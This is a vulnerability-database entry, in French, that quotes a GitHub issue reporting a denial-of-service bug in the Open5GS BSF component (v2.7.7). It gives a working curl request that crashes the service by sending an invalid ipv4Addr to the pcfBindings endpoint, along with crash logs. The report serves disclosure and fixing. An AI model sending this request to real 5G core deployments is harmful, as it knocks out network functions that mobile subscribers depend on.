| Titre | Open5gs BSF v2.7.7 Denial of Service |
|---|
| Description | ### Open5GS Release, Revision, or Tag
v2.7.7
### Description
BSF crashes when a `POST /nbsf-management/v1/pcfBindings` request contains an
invalid `ipv4Addr` string.
The handler attempts to create a new BSF session with
`bsf_sess_add_by_ip_address()`. That helper returns `NULL` when
`ogs_ipv4_from_string()` fails, but the caller immediately does
`ogs_assert(sess)`, aborting the process.
### Steps to reproduce
```bash
curl --http2-prior-knowledge -m 5 -sS -i \
-X POST http://10.33.33.5/nbsf-management/v1/pcfBindings \
-H 'content-type: application/json' \
--data '{"ipv4Addr":"not-an-ipv4","dnn":"internet","snssai":{"sst":1,"sd":"000001"},"pcfFqdn":"pcf.example"}'
```
Then check:
```bash
docker inspect -f '{{.State.Status}} {{.State.ExitCode}} {{.State.FinishedAt}}' bsf
docker logs --since 2026-04-10T17:04:56Z bsf
```
### Logs
```text
04/10 17:05:15.235: [core] ERROR: Invalid IPv4 string = not-an-ipv4
04/10 17:05:15.235: [bsf] ERROR: bsf_sess_set_ipv4addr[not-an-ipv4] failed
04/10 17:05:15.235: [bsf] FATAL: bsf_state_operational: Assertion `sess' failed. (../src/bsf/bsf-sm.c:157)
```
### Expected behaviour
BSF should reject invalid `ipv4Addr` input with a normal HTTP error response
and remain running.
### Observed Behaviour
The connection is reset and the BSF process exits with code `139`.
### eNodeB/gNodeB
Not required.
### UE Models and versions
Not required. |
|---|
| La source | ⚠️ https://github.com/open5gs/open5gs/issues/4400 |
|---|
| Utilisateur | ZiyuLin (UID 93568) |
|---|
| Soumission | 14/04/2026 10:51 (il y a 2 mois) |
|---|
| Modérer | 30/04/2026 20:17 (16 days later) |
|---|
| Statut | Accepté |
|---|
| Entrée VulDB | 360353 [Open5GS jusqu’à 2.7.7 BSF pcfBindings bsf_sess_add_by_ip_address ipv4Addr déni de service] |
|---|
| Points | 20 |
|---|